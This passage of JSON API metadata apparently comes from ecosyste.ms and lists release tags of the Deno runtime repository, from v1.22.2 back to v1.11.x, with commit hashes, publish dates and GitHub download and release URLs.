https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527e